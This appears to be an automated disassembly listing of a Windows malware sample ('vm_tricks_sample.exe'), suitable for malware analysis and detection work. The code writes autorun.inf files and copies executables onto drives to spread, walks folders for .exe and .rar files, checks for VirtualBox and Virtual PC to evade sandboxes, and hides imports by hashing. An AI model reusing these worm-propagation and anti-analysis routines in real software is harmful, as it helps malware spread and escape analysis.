00413610 add esp, 04h
00413613 mov eax, dword ptr [ebp+10h]
00413616 push eax
00413617 call 00415EDCh
0041361C add esp, 04h
0041361F mov dword ptr [ebp-00000204h], eax
00413625 lea ecx, dword ptr [ebp-00000400h]
0041362B push ecx
0041362C call 00415EDCh
00413631 add esp, 04h
00413634 mov dword ptr [ebp-08h], eax
00413637 mov edx, dword ptr [ebp-08h] xrefs 0041367E
0041363A cmp edx, dword ptr [ebp-00000204h]
00413640 jc 00413680h
00413642 mov eax, dword ptr [ebp-00000204h]
00413648 push eax
00413649 lea ecx, dword ptr [ebp-00000400h]
0041364F push ecx
00413650 mov edx, dword ptr [ebp+10h]
00413653 push edx
00413654 call 00415EABh
00413659 add esp, 0Ch
0041365C test eax, eax
0041365E jne 00413666h
00413660 mov al, 01h
00413662 jmp 0041368Fh
00413666 lea eax, dword ptr [ebp-00000400h] xrefs 0041365E
0041366C push eax
0041366D call 004132E0h
00413672 add esp, 04h
00413675 mov ecx, dword ptr [ebp-08h]
00413678 sub ecx, 01h
0041367B mov dword ptr [ebp-08h], ecx
0041367E jmp 00413637h xrefs 00413664
00413680 cmp dword ptr [ebp-00000408h], 02h xrefs 004135D3, 00413640
00413687 jne 0041368Dh
00413689 xor al, al
0041368B jmp 0041368Fh
0041368D xor al, al xrefs 0041359C, 00413687
0041368F mov esp, ebp xrefs 0041368B, 00413662
00413691 pop ebp
00413692 ret function end
Function 004153C0, API count: 0, instr count: 196
Strings
  • \Upd.exe, va: 00411A9C
  • \Zwr.exe, va: 00411A44
  • [autorun]open=Zwr.exe, va: 00411A50
  • \autorun.inf, va: 00411A6C
  • \autorun.inf, va: 00411A7C
  • \autorun.inf, va: 00411A8C
  • \Update.exe, va: 004119E8
  • [autorun]open=Update.exe, va: 004119F4
  • \autorun.inf, va: 00411A14
  • \autorun.inf, va: 00411A24
  • \autorun.inf, va: 00411A34
Address Instruction Meta Information
004153C0 push ebp
004153C1 mov ebp, esp
004153C3 sub esp, 000000BCh
004153C9 push esi
004153CA push edi
004153CB mov eax, 00000001h xrefs 004156C4
004153D0 test eax, eax
004153D2 je 004156C9h
004153D8 push 0001D4C0h
004153DD call 00414180h
004153E2 mov dword ptr [ebp-04h], 00000000h
004153E9 jmp 004153F4h
004153F4 cmp dword ptr [ebp-04h], 18h xrefs 004153E9
004153F8 jnl 004156C4h
004153FE mov edx, dword ptr [ebp-04h]
00415401 mov eax, dword ptr [004010B0h+edx*4]
00415408 push eax
00415409 call 00414270h
0041540E cmp eax, 02h
00415411 jne 004154F5h
00415417 mov ecx, dword ptr [004119E8h] ASCII "\Update.exe"
0041541D mov dword ptr [ebp-28h], ecx
00415420 mov edx, dword ptr [004119ECh] 2E657461
00415426 mov dword ptr [ebp-24h], edx
00415429 mov eax, dword ptr [004119F0h] 00657865
0041542E mov dword ptr [ebp-20h], eax
00415431 xor ecx, ecx
00415433 mov dword ptr [ebp-1Ch], ecx
00415436 mov dword ptr [ebp-18h], ecx
00415439 mov dword ptr [ebp-14h], ecx
0041543C mov dword ptr [ebp-10h], ecx
0041543F mov word ptr [ebp-0Ch], cx
00415443 mov ecx, 00000006h
00415448 mov esi, 004119F4h ASCII "[autorun]open=Update.exe"
0041544D lea edi, dword ptr [ebp-5Ch]
00415450 rep movsd
00415452 movsw
00415454 movsb
00415455 xor edx, edx
00415457 mov dword ptr [ebp-41h], edx
0041545A mov dword ptr [ebp-3Dh], edx
0041545D mov dword ptr [ebp-39h], edx
00415460 mov dword ptr [ebp-35h], edx
00415463 mov dword ptr [ebp-31h], edx
00415466 mov word ptr [ebp-2Dh], dx
0041546A mov byte ptr [ebp-2Bh], dl
0041546D push 00411A10h
00415472 push 00411A14h ASCII "\autorun.inf"
00415477 call 004160ABh
0041547C add esp, 08h
0041547F mov dword ptr [ebp-08h], eax
00415482 lea eax, dword ptr [ebp-5Ch]
00415485 push eax
00415486 mov ecx, dword ptr [ebp-08h]
00415489 push ecx
0041548A call 004160BEh
0041548F add esp, 08h
00415492 mov edx, dword ptr [ebp-08h]
00415495 push edx
00415496 call 004160F5h
0041549B add esp, 04h
0041549E push 00000001h
004154A0 mov eax, dword ptr [ebp-04h]
004154A3 mov ecx, dword ptr [004010B0h+eax*4]
004154AA push ecx
004154AB push 00411A24h ASCII "\autorun.inf"
004154B0 call 004156E0h
004154B5 push 00411A34h ASCII "\autorun.inf"
004154BA call 0041609Bh
004154BF add esp, 04h
004154C2 lea edx, dword ptr [ebp-28h]
004154C5 push edx
004154C6 mov eax, dword ptr [ebp-04h]
004154C9 mov ecx, dword ptr [004010B0h+eax*4]
004154D0 push ecx
004154D1 call 00416005h
004154D6 add esp, 08h
004154D9 push 00000001h
004154DB mov edx, dword ptr [ebp-04h]
004154DE mov eax, dword ptr [004010B0h+edx*4]
004154E5 push eax
004154E6 push 004168F0h
004154EB call 004156E0h
004154F0 jmp 004156BFh
004154F5 mov ecx, dword ptr [ebp-04h] xrefs 00415411
004154F8 mov edx, dword ptr [004010B0h+ecx*4]
004154FF push edx
00415500 call 00414270h
00415505 cmp eax, 05h
00415508 jne 0041563Bh
0041550E mov eax, dword ptr [00411A44h] ASCII "\Zwr.exe"
00415513 mov dword ptr [ebp-000000A4h], eax
00415519 mov ecx, dword ptr [00411A48h] 6578652E
0041551F mov dword ptr [ebp-000000A0h], ecx
00415525 mov dl, byte ptr [00411A4Ch] 00
0041552B mov byte ptr [ebp-0000009Ch], dl
00415531 xor eax, eax
00415533 mov dword ptr [ebp-0000009Bh], eax
00415539 mov dword ptr [ebp-00000097h], eax
0041553F mov word ptr [ebp-00000093h], ax
00415546 mov byte ptr [ebp-00000091h], al
0041554C mov ecx, dword ptr [00411A50h] ASCII "[autorun]open=Zwr.exe"
00415552 mov dword ptr [ebp-00000090h], ecx
00415558 mov edx, dword ptr [00411A54h] 6E75726F
0041555E mov dword ptr [ebp-0000008Ch], edx
00415564 mov eax, dword ptr [00411A58h] 6F0A0D5D
00415569 mov dword ptr [ebp-00000088h], eax
0041556F mov ecx, dword ptr [00411A5Ch] 3D6E6570
00415575 mov dword ptr [ebp-00000084h], ecx
0041557B mov edx, dword ptr [00411A60h] 2E72775A
00415581 mov dword ptr [ebp-80h], edx
00415584 mov eax, dword ptr [00411A64h] 00657865
00415589 mov dword ptr [ebp-7Ch], eax
0041558C xor ecx, ecx
0041558E mov dword ptr [ebp-78h], ecx
00415591 mov dword ptr [ebp-74h], ecx
00415594 mov dword ptr [ebp-70h], ecx
00415597 mov dword ptr [ebp-6Ch], ecx
0041559A mov dword ptr [ebp-68h], ecx
0041559D mov dword ptr [ebp-64h], ecx
004155A0 mov word ptr [ebp-60h], cx
004155A4 push 00411A68h
004155A9 push 00411A6Ch ASCII "\autorun.inf"
004155AE call 004160ABh
004155B3 add esp, 08h
004155B6 mov dword ptr [ebp-000000A8h], eax
004155BC lea edx, dword ptr [ebp-00000090h]
004155C2 push edx
004155C3 mov eax, dword ptr [ebp-000000A8h]
004155C9 push eax
004155CA call 004160BEh
004155CF add esp, 08h
004155D2 mov ecx, dword ptr [ebp-000000A8h]
004155D8 push ecx
004155D9 call 004160F5h
004155DE add esp, 04h
004155E1 push 00000001h
004155E3 mov edx, dword ptr [ebp-04h]
004155E6 mov eax, dword ptr [004010B0h+edx*4]
004155ED push eax
004155EE push 00411A7Ch ASCII "\autorun.inf"
004155F3 call 004156E0h
004155F8 push 00411A8Ch ASCII "\autorun.inf"
004155FD call 0041609Bh
00415602 add esp, 04h
00415605 lea ecx, dword ptr [ebp-000000A4h]
0041560B push ecx
0041560C mov edx, dword ptr [ebp-04h]
0041560F mov eax, dword ptr [004010B0h+edx*4]
00415616 push eax
00415617 call 00416005h
0041561C add esp, 08h
0041561F push 00000001h
00415621 mov ecx, dword ptr [ebp-04h]
00415624 mov edx, dword ptr [004010B0h+ecx*4]
0041562B push edx
0041562C push 004168F0h
00415631 call 004156E0h
00415636 jmp 004156BFh
0041563B mov eax, dword ptr [ebp-04h] xrefs 00415508
0041563E mov ecx, dword ptr [004010B0h+eax*4]
00415645 push ecx
00415646 call 00414270h
0041564B cmp eax, 04h
0041564E jne 004156BFh
00415650 mov edx, dword ptr [00411A9Ch] ASCII "\Upd.exe"
00415656 mov dword ptr [ebp-000000BCh], edx
0041565C mov eax, dword ptr [00411AA0h] 6578652E
00415661 mov dword ptr [ebp-000000B8h], eax
00415667 mov cl, byte ptr [00411AA4h] 00
0041566D mov byte ptr [ebp-000000B4h], cl
00415673 xor edx, edx
00415675 mov dword ptr [ebp-000000B3h], edx
0041567B mov dword ptr [ebp-000000AFh], edx
00415681 mov word ptr [ebp-000000ABh], dx
00415688 mov byte ptr [ebp-000000A9h], dl
0041568E lea eax, dword ptr [ebp-000000BCh]
00415694 push eax
00415695 mov ecx, dword ptr [ebp-04h]
00415698 mov edx, dword ptr [004010B0h+ecx*4]
0041569F push edx
004156A0 call 00416005h
004156A5 add esp, 08h
004156A8 push 00000001h
004156AA mov eax, dword ptr [ebp-04h]
004156AD mov ecx, dword ptr [004010B0h+eax*4]
004156B4 push ecx
004156B5 push 004168F0h
004156BA call 004156E0h
004156BF jmp 004153EBh xrefs 0041564E, 00415636, 004154F0 swap point
004156C4 jmp 004153CBh xrefs 004153F8
004156C9 pop edi xrefs 004153D2
004156CA pop esi
004156CB mov esp, ebp
004156CD pop ebp
004156CE retn 0004h function end
Function 00414630, API count: 0, instr count: 32
Strings
  • %s\*.exe, va: 00411C04
Address Instruction Meta Information
00414630 push ebp xrefs 0041484B, 0041486D, 0041488F
00414631 mov ebp, esp
00414633 sub esp, 0000024Ch
00414639 mov eax, dword ptr [ebp+08h]
0041463C push eax
0041463D push 00411C04h ASCII "%s\*.exe"
00414642 lea ecx, dword ptr [ebp-00000108h]
00414648 push ecx
00414649 call 004141C0h
0041464E add esp, 0Ch
00414651 lea edx, dword ptr [ebp-00000248h]
00414657 push edx
00414658 lea eax, dword ptr [ebp-00000108h]
0041465E push eax
0041465F call 004140F0h
00414664 mov dword ptr [ebp-0000024Ch], eax
0041466A mov ecx, dword ptr [ebp+08h] xrefs 00414692
0041466D push ecx
0041466E lea edx, dword ptr [ebp-0000021Ch]
00414674 push edx
00414675 call 004145F0h
0041467A add esp, 08h
0041467D lea eax, dword ptr [ebp-00000248h]
00414683 push eax
00414684 mov ecx, dword ptr [ebp-0000024Ch]
0041468A push ecx
0041468B call 004141E0h
00414690 test eax, eax
00414692 jne 0041466Ah
00414694 mov esp, ebp
00414696 pop ebp
00414697 ret function end
Function 0041609B, API count: 1, instr count: 6
APIs
  • DeleteFileA.KERNEL32, ref: 0041609F
Address Instruction Meta Information
0041609B push dword ptr [esp+04h] xrefs 004155FD, 004154BA
0041609F call dword ptr [0040102Ch] DeleteFileA@KERNEL32.DLL (Import)
004160A5 neg eax
004160A7 sbb eax, eax
004160A9 inc eax
004160AA ret function end
Function 004127E0, API count: 0, instr count: 116
Strings
  • vmusrvc.exe, va: 00411F10
  • vmsrvc.exe, va: 00411F1C
  • SYSTEM\ControlSet001\Services, va: 00411F28
  • vpcbus, va: 00411F48
  • vpc-s3, va: 00411F50
  • vpcuhub, va: 00411F58
  • msvmmouf, va: 00411F60
Address Instruction Meta Information
004127E0 push ebp xrefs 00414806
004127E1 mov ebp, esp
004127E3 sub esp, 000001E0h
004127E9 push esi
004127EA push edi
004127EB mov eax, dword ptr [00411F10h] ASCII "vmusrvc.exe"
004127F0 mov dword ptr [ebp-000001E0h], eax
004127F6 mov ecx, dword ptr [00411F14h] 2E637672
004127FC mov dword ptr [ebp-000001DCh], ecx
00412802 mov edx, dword ptr [00411F18h] 00657865
00412808 mov dword ptr [ebp-000001D8h], edx
0041280E xor eax, eax
00412810 mov dword ptr [ebp-000001D4h], eax
00412816 mov dword ptr [ebp-000001D0h], eax
0041281C mov ecx, dword ptr [00411F1Ch] ASCII "vmsrvc.exe"
00412822 mov dword ptr [ebp-000001CCh], ecx
00412828 mov edx, dword ptr [00411F20h] 652E6376
0041282E mov dword ptr [ebp-000001C8h], edx
00412834 mov ax, word ptr [00411F24h] 6578
0041283A mov word ptr [ebp-000001C4h], ax
00412841 mov cl, byte ptr [00411F26h] 00
00412847 mov byte ptr [ebp-000001C2h], cl
0041284D xor edx, edx
0041284F mov dword ptr [ebp-000001C1h], edx
00412855 mov dword ptr [ebp-000001BDh], edx
0041285B mov byte ptr [ebp-000001B9h], dl
00412861 xor eax, eax
00412863 mov word ptr [ebp-04h], ax
00412867 jmp 00412875h
00412869 mov cx, word ptr [ebp-04h] xrefs 004128A3
0041286D add cx, 0001h
00412871 mov word ptr [ebp-04h], cx
00412875 movzx edx, word ptr [ebp-04h] xrefs 00412867
00412879 cmp edx, 02h
0041287C jnl 004128A5h
0041287E movzx eax, word ptr [ebp-04h]
00412882 imul eax, eax, 14h
00412885 lea ecx, dword ptr [ebp+eax-000001E0h]
0041288C push ecx
0041288D call 00413380h
00412892 add esp, 04h
00412895 movzx edx, al
00412898 test edx, edx
0041289A je 004128A3h
0041289C mov al, 01h
0041289E jmp 004129A2h
004128A3 jmp 00412869h xrefs 0041289A
004128A5 mov ecx, 00000007h xrefs 0041287C
004128AA mov esi, 00411F28h ASCII "SYSTEM\ControlSet001\Services"
004128AF lea edi, dword ptr [ebp-000001B8h]
004128B5 rep movsd
004128B7 movsw
004128B9 mov eax, dword ptr [00411F48h] ASCII "vpcbus"
004128BE mov dword ptr [ebp-00000198h], eax
004128C4 mov cx, word ptr [00411F4Ch] 7375
004128CB mov word ptr [ebp-00000194h], cx
004128D2 mov dl, byte ptr [00411F4Eh] 00
004128D8 mov byte ptr [ebp-00000192h], dl
004128DE push 0000005Dh
004128E0 push 00000000h
004128E2 lea eax, dword ptr [ebp-00000191h]
004128E8 push eax
004128E9 call 00415F8Fh
004128EE add esp, 0Ch
004128F1 mov ecx, dword ptr [00411F50h] ASCII "vpc-s3"
004128F7 mov dword ptr [ebp-00000134h], ecx
004128FD mov dx, word ptr [00411F54h] 3373
00412904 mov word ptr [ebp-00000130h], dx
0041290B mov al, byte ptr [00411F56h] 00
00412910 mov byte ptr [ebp-0000012Eh], al
00412916 push 0000005Dh
00412918 push 00000000h
0041291A lea ecx, dword ptr [ebp-0000012Dh]
00412920 push ecx
00412921 call 00415F8Fh
00412926 add esp, 0Ch
00412929 mov edx, dword ptr [00411F58h] ASCII "vpcuhub"
0041292F mov dword ptr [ebp-000000D0h], edx
00412935 mov eax, dword ptr [00411F5Ch] 00627568
0041293A mov dword ptr [ebp-000000CCh], eax
00412940 push 0000005Ch
00412942 push 00000000h
00412944 lea ecx, dword ptr [ebp-000000C8h]
0041294A push ecx
0041294B call 00415F8Fh
00412950 add esp, 0Ch
00412953 mov edx, dword ptr [00411F60h] ASCII "msvmmouf"
00412959 mov dword ptr [ebp-6Ch], edx
0041295C mov eax, dword ptr [00411F64h] 66756F6D
00412961 mov dword ptr [ebp-68h], eax
00412964 mov cl, byte ptr [00411F68h] 00
0041296A mov byte ptr [ebp-64h], cl
0041296D push 0000005Bh
0041296F push 00000000h
00412971 lea edx, dword ptr [ebp-63h]
00412974 push edx
00412975 call 00415F8Fh
0041297A add esp, 0Ch
0041297D push 00000004h
0041297F lea eax, dword ptr [ebp-00000198h]
00412985 push eax
00412986 lea ecx, dword ptr [ebp-000001B8h]
0041298C push ecx
0041298D call 00413450h
00412992 add esp, 0Ch
00412995 movzx edx, al
00412998 test edx, edx
0041299A je 004129A0h
0041299C mov al, 01h
0041299E jmp 004129A2h
004129A0 xor al, al xrefs 0041299A
004129A2 pop edi xrefs 0041299E, 0041289E
004129A3 pop esi
004129A4 mov esp, ebp
004129A6 pop ebp
004129A7 ret function end
Function 0041611C, API count: 4, instr count: 82
APIs
    • ExitProcess.KERNEL32, ref: 0041632D
  • ExitProcess.KERNEL32, ref: 0041614F
  • GetCommandLineA.KERNEL32, ref: 0041616A
  • GetStartupInfoA.KERNEL32, ref: 004161B3
  • GetModuleHandleA.KERNEL32, ref: 004161DD
Address Instruction Meta Information
0041611C push ebp
0041611D mov ebp, esp
0041611F sub esp, 44h
00416122 mov eax, dword ptr [00418CE4h] 00000000
00416127 test eax, eax
00416129 je 00416135h
0041612B call eax
0041612D test eax, eax
0041612F jne 00416135h
00416131 push FFFFFFFEh
00416133 jmp 0041614Fh
00416135 push 00000001h xrefs 00416129, 0041612F
00416137 push 00401088h
0041613C push 00401080h
00416141 call 00416334h
00416146 add esp, 0Ch
00416149 test eax, eax
0041614B je 00416155h
0041614D push FFFFFFFDh
0041614F call dword ptr [0040101Ch] ExitProcess@KERNEL32.DLL (Import) xrefs 00416133
00416155 push esi xrefs 0041614B
00416156 push 00000000h
00416158 push 0040107Ch
0041615D push 00401078h
00416162 call 00416334h
00416167 add esp, 0Ch
0041616A call dword ptr [00401020h] GetCommandLineA@KERNEL32.DLL (Import)
00416170 mov esi, eax
00416172 test esi, esi
00416174 jne 0041617Bh
00416176 mov esi, 00411970h
0041617B mov cl, 20h xrefs 00416174
0041617D jmp 00416184h
0041617F cmp al, 20h xrefs 00416188
00416181 jnbe 0041618Eh
00416183 inc esi
00416184 mov al, byte ptr [esi] xrefs 0041617D
00416186 test al, al
00416188 jne 0041617Fh
0041618A cmp al, 20h
0041618C jbe 004161A5h
0041618E mov al, byte ptr [esi] xrefs 00416181
00416190 cmp al, 22h xrefs 0041619C
00416192 jne 00416197h
00416194 xor cl, 00000020h
00416197 inc esi xrefs 00416192
00416198 mov al, byte ptr [esi]
0041619A cmp al, cl
0041619C jnbe 00416190h
0041619E jmp 004161A5h
004161A0 cmp al, cl xrefs 004161A9
004161A2 jnbe 004161ABh
004161A4 inc esi
004161A5 mov al, byte ptr [esi] xrefs 0041619E, 0041618C
004161A7 test al, al
004161A9 jne 004161A0h
004161AB and dword ptr [ebp-18h], 00000000h xrefs 004161A2
004161AF lea eax, dword ptr [ebp-44h]
004161B2 push eax
004161B3 call dword ptr [00401024h] GetStartupInfoA@KERNEL32.DLL (Import)
004161B9 test eax, 0A0D0A0Dh
004161BE sub eax, 54524357h
004161C3 sub eax, 0A0D0A0Dh
004161C8 test byte ptr [ebp-18h], 00000001h
004161CC je 004161D4h
004161CE movzx eax, word ptr [ebp-14h]
004161D2 jmp 004161D7h
004161D4 push 0000000Ah xrefs 004161CC
004161D6 pop eax
004161D7 push eax xrefs 004161D2
004161D8 push esi
004161DB push 00000000h Count = 2
004161DD call dword ptr [00401028h] GetModuleHandleA@KERNEL32.DLL (Import)
004161E3 push eax
004161E4 call 004147E0h
004161E9 push eax
004161EA call 004162FFh
004161EF pop ecx
004161F0 pop esi
004161F1 leave
004161F2 ret function end
Function 004162AF, API count: 1, instr count: 30
APIs
  • WriteFile.KERNEL32, ref: 004162D0
Address Instruction Meta Information
004162AF push ebp xrefs 004160EC
004162B0 mov ebp, esp
004162B2 mov eax, dword ptr [ebp+08h]
004162B5 push esi
004162B6 xor ecx, ecx
004162B8 xor esi, esi
004162BA cmp byte ptr [eax], cl
004162BC je 004162C4h
004162BE inc esi xrefs 004162C2
004162BF cmp byte ptr [esi+eax], cl
004162C2 jne 004162BEh
004162C4 push ecx xrefs 004162BC
004162C5 lea ecx, dword ptr [ebp+08h]
004162C8 push ecx
004162C9 push esi
004162CA push eax
004162CB mov eax, dword ptr [ebp+0Ch]
004162CE push dword ptr [eax]
004162D0 call dword ptr [0040100Ch] WriteFile@KERNEL32.DLL (Import)
004162D6 test eax, eax
004162D8 jne 004162DFh
004162DA or eax, FFFFFFFFh
004162DD jmp 004162E9h
004162DF mov eax, dword ptr [ebp+08h] xrefs 004162D8
004162E2 cmp eax, esi
004162E4 je 004162E9h
004162E6 or eax, FFFFFFFFh
004162E9 pop esi xrefs 004162E4, 004162DD
004162EA pop ebp
004162EB ret function end
Function 00413ED0, API count: 0, instr count: 37
Strings
  • z:\, va: 00411D9C
Address Instruction Meta Information
00413ED0 push ebp
00413ED1 mov ebp, esp
00413ED3 sub esp, 08h
00413ED6 mov eax, dword ptr [00411D9Ch] ASCII "z:\"
00413EDB mov dword ptr [ebp-04h], eax
00413EDE push 00000104h
00413EE3 push 004163E8h
00413EE8 push 00000000h
00413EEA call 00414220h
00413EEF test eax, eax
00413EF1 jne 00413EFAh
00413EF3 push 00000000h
00413EF5 call 00414250h
00413EFA lea ecx, dword ptr [ebp-04h] xrefs 00413EF1, 00413F34
00413EFD push ecx
00413EFE call 00414270h
00413F03 mov dword ptr [ebp-08h], eax
00413F06 cmp dword ptr [ebp-08h], 03h
00413F0A je 00413F12h
00413F0C cmp dword ptr [ebp-08h], 04h
00413F10 jne 00413F25h
00413F12 lea edx, dword ptr [ebp-04h] xrefs 00413F0A
00413F15 push edx
00413F16 call 00414110h
00413F1B cmp eax, 01h
00413F1E jne 00413F25h
00413F20 call 00413D50h
00413F25 mov al, byte ptr [ebp-04h] xrefs 00413F1E, 00413F10
00413F28 sub al, 01h
00413F2A mov byte ptr [ebp-04h], al
00413F2D movsx ecx, byte ptr [ebp-04h]
00413F31 cmp ecx, 62h
00413F34 jne 00413EFAh
00413F36 mov eax, 00000001h
00413F3B mov esp, ebp
00413F3D pop ebp
00413F3E retn 0004h function end
Function 004136C0, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • Process32First.KERNEL32, ref: 004136DA
Address Instruction Meta Information
004136C0 push ebp xrefs 004133DF
004136C1 mov ebp, esp
004136C3 mov eax, dword ptr [ebp+0Ch]
004136C6 push eax
004136C7 mov ecx, dword ptr [ebp+08h]
004136CA push ecx
004136CB push 6B5366BEh
004136D0 push 19F78C90h
004136D5 call 00415E40h
004136DA call eax Process32First@KERNEL32.DLL (Hidden Import)
004136DC pop ebp
004136DD retn 0008h function end
Function 00413D50, API count: 0, instr count: 98
Strings
  • *.*, va: 00411D90
  • rar, va: 00411D98
  • C:\vm_tricks_sample.exe, va: 004163E8
Address Instruction Meta Information
00413D50 push ebp xrefs 00413F20, 00413DB0
00413D51 mov ebp, esp
00413D53 sub esp, 00000358h
00413D59 mov dword ptr [ebp-08h], 00000000h
00413D60 lea eax, dword ptr [ebp-00000250h]
00413D66 push eax
00413D67 push 00411D90h ASCII "*.*"
00413D6C call 004140F0h
00413D71 mov dword ptr [ebp-04h], eax
00413D74 cmp dword ptr [ebp-04h], FFFFFFFFh
00413D78 je 00413ECAh
00413D7E movsx ecx, byte ptr [ebp-00000224h] xrefs 00413EBB
00413D85 cmp ecx, 2Eh
00413D88 je 00413EA9h
00413D8E mov edx, dword ptr [ebp-00000250h]
00413D94 and edx, 10h
00413D97 mov dword ptr [ebp-00000250h], edx
00413D9D je 00413DC4h
00413D9F lea eax, dword ptr [ebp-00000224h]
00413DA5 push eax
00413DA6 call 00414110h
00413DAB cmp eax, 01h
00413DAE jne 00413DBFh
00413DB0 call 00413D50h
00413DB5 push 00411D94h
00413DBA call 00414110h
00413DBF jmp 00413EA9h xrefs 00413DAE
00413DC4 lea ecx, dword ptr [ebp-08h] xrefs 00413D9D
00413DC7 push ecx
00413DC8 lea edx, dword ptr [ebp-00000110h]
00413DCE push edx
00413DCF push 00000104h
00413DD4 lea eax, dword ptr [ebp-00000224h]
00413DDA push eax
00413DDB call 00414130h
00413DE0 test eax, eax
00413DE2 je 00413EA9h
00413DE8 lea ecx, dword ptr [ebp-00000110h]
00413DEE push ecx
00413DEF call 00414160h
00413DF4 push 00000003h
00413DF6 push 00411D98h ASCII "rar"
00413DFB lea edx, dword ptr [ebp-00000110h]
00413E01 push edx
00413E02 call 004140B0h
00413E07 lea eax, dword ptr [ebp+eax-00000113h]
00413E0E push eax
00413E0F call 00415F55h
00413E14 add esp, 0Ch
00413E17 test eax, eax
00413E19 jne 00413EA9h
00413E1F push 00001388h
00413E24 call 00414180h
00413E29 call 004141A0h
00413E2E push eax
00413E2F call 00415FC2h
00413E34 add esp, 04h
00413E37 push 00411928h
00413E3C call 00413800h
00413E41 add esp, 04h
00413E44 mov ecx, dword ptr [00411928h+eax*4]
00413E4B mov dword ptr [ebp-00000358h], ecx
00413E51 call 004141A0h
00413E56 push eax
00413E57 call 00415FC2h
00413E5C add esp, 04h
00413E5F call 00415FCCh
00413E64 xor edx, edx
00413E66 mov ecx, 00000004h
00413E6B div ecx
00413E6D mov dword ptr [ebp-00000354h], edx
00413E73 mov edx, dword ptr [ebp-00000358h]
00413E79 push edx
00413E7A lea eax, dword ptr [ebp-00000350h]
00413E80 push eax
00413E81 call 004141C0h
00413E86 add esp, 08h
00413E89 push 00000080h
00413E8E lea ecx, dword ptr [ebp-00000350h]
00413E94 push ecx
00413E95 push 004163E8h ASCII "C:\vm_tricks_sample.exe"
00413E9A lea edx, dword ptr [ebp-00000110h]
00413EA0 push edx
00413EA1 call 004138F0h
00413EA6 add esp, 10h
00413EA9 lea eax, dword ptr [ebp-00000250h] xrefs 00413D88, 00413DE2, 00413E19, 00413DBF
00413EAF push eax
00413EB0 mov ecx, dword ptr [ebp-04h]
00413EB3 push ecx
00413EB4 call 004141E0h
00413EB9 test eax, eax
00413EBB jne 00413D7Eh
00413EC1 mov edx, dword ptr [ebp-04h]
00413EC4 push edx
00413EC5 call 00414200h
00413ECA mov esp, ebp xrefs 00413D78
00413ECC pop ebp
00413ECD ret function end
Function 00413450, API count: 0, instr count: 83
Address Instruction Meta Information
00413450 push ebp xrefs 00412516, 00412742, 0041298D, 00412E52, 00412E16, 004132BE, 00413299
00413451 mov ebp, esp
00413453 sub esp, 00000118h
00413459 lea eax, dword ptr [ebp-04h]
0041345C push eax
0041345D push 00000008h
0041345F push 00000000h
00413461 mov ecx, dword ptr [ebp+08h]
00413464 push ecx
00413465 push 80000002h
0041346A call 00413720h
0041346F test eax, eax
00413471 jne 00413551h
00413477 mov dword ptr [ebp-08h], 00000000h
0041347E jmp 00413489h
00413480 mov edx, dword ptr [ebp-08h] xrefs 0041354C
00413483 add edx, 01h
00413486 mov dword ptr [ebp-08h], edx
00413489 mov eax, 00000001h xrefs 0041347E
0041348E test eax, eax
00413490 je 00413551h
00413496 mov dword ptr [ebp-00000118h], 000000FFh
004134A6 push 00000000h Count = 4
004134A8 lea ecx, dword ptr [ebp-00000118h]
004134AE push ecx
004134AF lea edx, dword ptr [ebp-00000110h]
004134B5 push edx
004134B6 mov eax, dword ptr [ebp-08h]
004134B9 push eax
004134BA mov ecx, dword ptr [ebp-04h]
004134BD push ecx
004134BE call 00413750h
004134C3 mov dword ptr [ebp-0Ch], eax
004134C6 mov byte ptr [ebp-11h], 00000000h
004134CA cmp dword ptr [ebp-0Ch], 00000000h
004134CE jne 00413536h
004134D0 mov dword ptr [ebp-00000114h], 00000000h
004134DA jmp 004134EBh
004134DC mov edx, dword ptr [ebp-00000114h] xrefs 00413532
004134E2 add edx, 01h
004134E5 mov dword ptr [ebp-00000114h], edx
004134EB movzx eax, word ptr [ebp+10h] xrefs 004134DA
004134EF cmp dword ptr [ebp-00000114h], eax
004134F5 jnc 00413534h
004134F7 mov ecx, dword ptr [ebp-00000114h]
004134FD imul ecx, ecx, 64h
00413500 add ecx, dword ptr [ebp+0Ch]
00413503 je 00413532h
00413505 lea edx, dword ptr [ebp-00000110h]
0041350B push edx
0041350C mov eax, dword ptr [ebp-00000114h]
00413512 imul eax, eax, 64h
00413515 add eax, dword ptr [ebp+0Ch]
00413518 push eax
00413519 call 00415F11h
0041351E add esp, 08h
00413521 test eax, eax
00413523 jne 00413532h
00413525 mov ecx, dword ptr [ebp-04h]
00413528 push ecx
00413529 call 00413790h
0041352E mov al, 01h
00413530 jmp 0041355Ch
00413532 jmp 004134DCh xrefs 00413503, 00413523
00413534 jmp 0041354Ch xrefs 004134F5
00413536 cmp dword ptr [ebp-0Ch], 00000103h xrefs 004134CE
0041353D jne 0041354Ch
0041353F mov edx, dword ptr [ebp-04h]
00413542 push edx
00413543 call 00413790h
00413548 xor al, al
0041354A jmp 0041355Ch
0041354C jmp 00413480h xrefs 0041353D, 00413534
00413551 mov eax, dword ptr [ebp-04h] xrefs 00413471, 00413490
00413554 push eax
00413555 call 00413790h
0041355A xor al, al
0041355C mov esp, ebp xrefs 00413530, 0041354A
0041355E pop ebp
0041355F ret function end
Function 004129B0, API count: 0, instr count: 332
Strings
  • vboxservice.exe, va: 00411F6C
  • vboxtray.exe, va: 00411F7C
  • HARDWARE\ACPI\DSDT, va: 00411F8C
  • HARDWARE\ACPI\FADT, va: 00411FA0
  • HARDWARE\ACPI\RSDT, va: 00411FB4
  • SYSTEM\ControlSet001\Services, va: 00411FC8
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0, va: 00411FE8
  • HARDWARE\DESCRIPTION\System, va: 00412038
  • VBOX__, va: 00412054
  • VBoxMouse, va: 0041205C
  • VBoxGuest, va: 00412068
  • VBoxService, va: 00412074
  • VBoxSF, va: 00412080
  • Identifier, va: 00412088
  • SystemBiosVersion, va: 00412094
  • VBOX, va: 004120A8
Address Instruction Meta Information
004129B0 push ebp xrefs 00414812
004129B1 mov ebp, esp
004129B3 sub esp, 00000680h
004129B9 push esi
004129BA push edi
004129BB mov eax, dword ptr [00411F6Ch] ASCII "vboxservice.exe"
004129C0 mov dword ptr [ebp-0000067Ch], eax
004129C6 mov ecx, dword ptr [00411F70h] 76726573
004129CC mov dword ptr [ebp-00000678h], ecx
004129D2 mov edx, dword ptr [00411F74h] 2E656369
004129D8 mov dword ptr [ebp-00000674h], edx
004129DE mov eax, dword ptr [00411F78h] 00657865
004129E3 mov dword ptr [ebp-00000670h], eax
004129E9 xor ecx, ecx
004129EB mov dword ptr [ebp-0000066Ch], ecx
004129F1 mov edx, dword ptr [00411F7Ch] ASCII "vboxtray.exe"
004129F7 mov dword ptr [ebp-00000668h], edx
